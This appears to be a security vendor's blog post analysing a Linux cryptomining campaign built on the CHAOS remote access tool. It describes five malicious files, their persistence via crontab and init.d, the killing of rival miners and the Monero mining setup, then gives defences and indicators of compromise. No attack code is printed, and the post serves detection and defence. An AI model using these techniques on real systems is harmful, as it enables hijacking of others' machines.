Amid CHAOS, There is Also Crypto Mining

Impact of Crypto Mining Infections

Sapphire’s SOC Team have been tracking a recent Crypto Mining campaign targeting Linux systems, utilising a proof-of-concept (PoC) hack tool hosted on GitHub known as ‘CHAOS’.

As many as one in six well-known vulnerability exploitations result in Crypto-mining software deployment. Q3 of 2022 saw the discovery of new Crypto Mining tools triple compared to Q3 of 2021 data.

In recent months, there has been a trend of vulnerable cloud-based infrastructure being targeted to deploy crypto-mining malware. A cryptominer can max out the CPU of a compromised asset, causing a significant increase in energy consumption. A system operating at around 15% CPU utilisation over one month may incur an electricity charge of around £17. With a deployed cryptominer maxing out the CPU to 100% utilisation, this monthly cost can increase to approximately £107.

Cryptocurrencies are digital monetary assets that can be exchanged via a peer-to-peer distribution system. This, in theory, reduces the reliance on a middleman or a centralised authority. Cryptocurrency comes into existence via one of two popular methods. This first is through ‘Proof-of-Work’ (PoW). Here, software called Cryptominers must solve increasingly complex mathematical computations.

Many earlier cryptocurrencies, such as Bitcoin and Monero, operate using PoW. The second and newer method is achieved through ‘Proof-of-Stake’ (PoS), which was designed to be much less computationally demanding. With PoS, blockchain participants must first own coins or tokens to become a validator.

Technical Analysis

Sapphire SOC Team has performed technical analysis on five malicious files associated with a recent CHAOS-infused Crypto Mining infection. Below, we will briefly cover these five files, explaining their purpose and operation.

Genshin
The Genshin file (the inspiration for its name coming from an RPG of the same name) is primarily responsible for downloading the CHAOS remote access tool onto a compromised system.

Genshin is an Executable and Linkable Format (ELF) file written and compiled using the Go programming language. Using UPX (Ultimate Packer for eXecutables), we could determine that this file was not packed, perhaps indicating a more rudimentary codebase. Malware is often packed for defence evasion purposes and to hinder reverse engineering attempts.

Several interesting strings were extracted from the binary during analysis, including four unique references to GitHub repositories. Two below are CHAOS and XGB (an API to communicate with X Server). We will briefly discuss the function of each.

The first reference to CHAOS, which is used for payload generation and remotely controlling a system, essentially offering Command and Control (C2) functionality. CHAOS can log keyboard input (T1056.001), create reverse shells (T1059.004), upload and download files (T1041), obtain system information (T1082), and perform system shutdowns (T1529). CHAOS has cross-platform capabilities, with versions available for both Linux and Windows.

The second tool, ‘screenshot’, is a cross-platform library written in Go that allows users to capture desktop screen images. Capturing screen content is a common threat actor technique to gather additional post-compromise information. This maps to MITRE ATT&CK ID T1113.

The third tool, ‘XGB’, is a low-level API used to communicate with X-Server, a program used to generate a graphical user interface. Its GitHub page describes its function: “The X Go Binding is a low-level API to communicate with the X server. It is modelled on XCB and supports many X extensions.” ‘X’, otherwise known as the X Window System, is a common component in Unix systems whereby it provides the framework needed to display a graphical user interface.

Next, using a sample of network traffic produced by Genshin, as shown below, we see that TCP

8080 (the default port used by the CHAOS tool). Open-source intelligence tools show that this address has also been reported as being used for Cobalt Strike (S0154) and Meterpreter (T1059) deployment.

The Genshin file was then checked for known malware behaviours, which map to Mitre’s ATT&CK framework. Here we see three behaviours identified: T1140 – Deobfuscate/Decode Files or Information, T1027 – Obfuscated Files or Information and T1082 – System Information Discovery, as shown below.

Further analysis, using Mandiant’s open-source malware analysis tool ‘capa,’ shows this ELF file’s contents to be encoded with a mix of XOR and Base64, with AES and RC4 PRGA algorithms used for data encryption. It also reads the contents of the /sys virtual filesystem to enumerate system information such as CPU and system power states.

Am32

The second file, ‘am32’, appears to be geared towards establishing persistence on the compromised system.

We see a scheduled task being created via /etc/crontab. A script called /etc/init.d/linux_kill is added as a system service. It then proceeds to read CPU attributes, modify RC scripts (T1037), and modifies system services (T1569) within init.d. Administrators legitimately use RC scripts to specify which run-level services should operate at on start-up.

However, threat actors can abuse this feature to establish persistence by appending malicious commands to the contents of existing RC scripts. Administrators can help mitigate this attack by limiting user accounts’ privileges, so only authorised users can edit the rc.common file.

Using Ghidra, we observe signs of attempted obfuscation where a string within a function has been encoded using Base64, as shown below. Once decoded, the string is a domain, Gn[.]lm7t[.]top, which is used to host malicious resources.

As shown below, analysis of the network traffic generated by am32 shows further communication to another unique, Hong Kong-based IP address and domain.[SH1]  This IP address was used to host additional resources, namely an encrypted password.txt file, a known IOC. This IP has also served other non-related, malicious Windows, Android, and Linux malware during the last two months.

Also being hosted on 154[.]82[.]92[.], 2 was an encrypted file named ‘cve.txt’. Again, using Ghidra, we see numerous functions containing references to ‘CVE’ in conjunction with CHAOS, as shown below.

These findings align with reports that state CHAOS can provide its operators with a manual method to scan the compromised system for vulnerabilities and perform automated vulnerability exploitation.

Solr.sh

The third file, ‘solr.sh,’ is a Shell script used to search for and disable any competing Crypto Mining software that may already be present on the compromised system.

Solr.sh consists of three main components. First, it disables system services, including sysguard and sysupdate. Sysguard is typically used to protect a server from failing due to high server loads. Sysupdate prevents the operating system from applying automatic updates. From a Crypto Mining perspective, removing any artificial CPU and RAM limitations on a server is beneficial to free up additional computing power. Solr.sh also searches for any competing Crypto Mining software that may be already running on the system and disables it. We see pkill being issued for other popular mining tools, including kinsing and watchbog.

Next, to establish persistence, several scheduled tasks are created, via command-line text editor sed, including what appears to be HTTP Get requests issued to a malicious Latvian IP associated with Crypto Mining activity, as shown below.

Lastly, the nohup command is used to silently execute the threat actor’s dropped files, including the Genshin file, as mentioned earlier, from within the /tmp directory, as shown below.

Rn02s62s.sh

The fourth file we analysed was ‘Rn02s62s.sh.’ Its primary function is to achieve persistence on the compromised system by modifying the crontab (T1053.003).

This file utilises attacker-controlled instructions hosted on an anonymous Pastebin posting to download a Linux scheduled task every ten minutes, as shown below.

Next, we see this script downloading additional malicious content from an attacker-controlled IP, after which permissions are assigned to the downloaded content to ensure they are executable, as shown below.

Config.json

The last file involved was a configuration file used to specify mining pool parameters.

Lastly, we see a .JSON file being downloaded via curl. This is part of the necessary setup to allow mining Monero via Xmrig. The config file shows multiple IP addresses associated with mining pools with various CPU performance configurations, shown right. In this instance, we observed a Chinese-based mining pool called C3Pool being utilised.

Recommendations

Using MITRE’s D3FEND framework, we have mapped several of the MITRE ATT&CK TTPs observed to give specific countermeasures.

• D3-SJA (Scheduled Job Analysis)
• D3-PSA (Process Spawn Analysis)
• D3-CI (Configuration Inventory)
• D3-EAL (Executable Allowlisting)
• D3-SCA (System Call Analysis)

Systems should be patched routinely and frequently to ensure an attacker cannot exploit known vulnerabilities. Systems should also be hardened by removing unnecessary services and software. Sapphire’s Managed Vulnerability Management services can assist with this.

Endpoint Detection & Response (EDR) products should be deployed on as many assets as possible to prevent known and unknown threats, such as cryptominers, from compromising assets. Sapphire’s Managed EDR can assist with enforcing D3-EAL and monitoring for D3-SCA.

Effective usage of perimeter firewalls and next-generation firewalls can mitigate specific attacks before they enter the network.

Managed SIEM and EDR alerting for anomalous ingress tool activity (T1105), such as curl and wget, can aid in detecting suspicious tools or other files being transferred from an external system into a compromised environment. Sapphire’s Managed SIEM can also be used to aid detection of D3-SJA and D3-PSA

Further recommendations for defending against Crypto Mining can be found at Sapphire’s partner Checkpoint via https://blog.checkpoint.com/2018/03/21/preventing-crypto-mining-attacks-four-key-steps-thatll-keep-safe/.

Indicators of Compromise (IOCs)

• 43[.]129[.]72[.]146
• 154[.]82[.]92[.]2
• 45[.]144[.]3[.]216

• Gn[.]lm7t[.]top

• 94803cf635cf08b96ea3de6b301563b5 (Genshin MD5)
• c05c91ec2b1a4504293ac9700123c91dc9e16f35 (Genshin SHA1)
• 759c496b114f9212c610892c5236935cced564a78b3b410bd2d27c9ee6257f42 (Genshin SHA256)

• d59e2231daa98370d4f6f7d675a4877a (am32 MD5)
• 51b36e12882be45cc1305dfb8acf0f5f9afc9dac (am32 SHA1)
• 01d5858fb9644293087eb48b4faf3a9aa9b1bce411bde26e04a70ebfcde4f072 (am32 SHA256)

• a53a9ca8a074c7108f8412c3f8c1fc5d (solr.sh MD5)
• a98dcdee82f6066a4cf2f9d7d161a1bacec8f81d (solr.sh SHA1)
• 7a96d9f7a25a67ec2873bb814cb0ba104d3b7c1651f65ff09d8e1f76cba6fb79 (solr.sh SHA256)

• 24d5079edbcb36be6b56ec4b67474cfd (rn02s62s MD5)
• a2193067bc0b1a2993ac927f7855877e1bad4b99 (rn02s62s SHA1)
• 52ab96b1d99964502a7946eef39a5f636d8a240c747d43f8568d62cf0e960ae9 (rn02s62s SHA256)